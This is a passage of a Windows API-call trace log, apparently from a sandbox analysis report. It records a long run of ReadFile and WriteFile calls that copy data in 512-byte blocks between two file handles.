hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.269] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.272] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.275] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.276] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.279] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.284] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.287] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.287] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.300] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.301] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.304] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.306] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.307] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.315] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 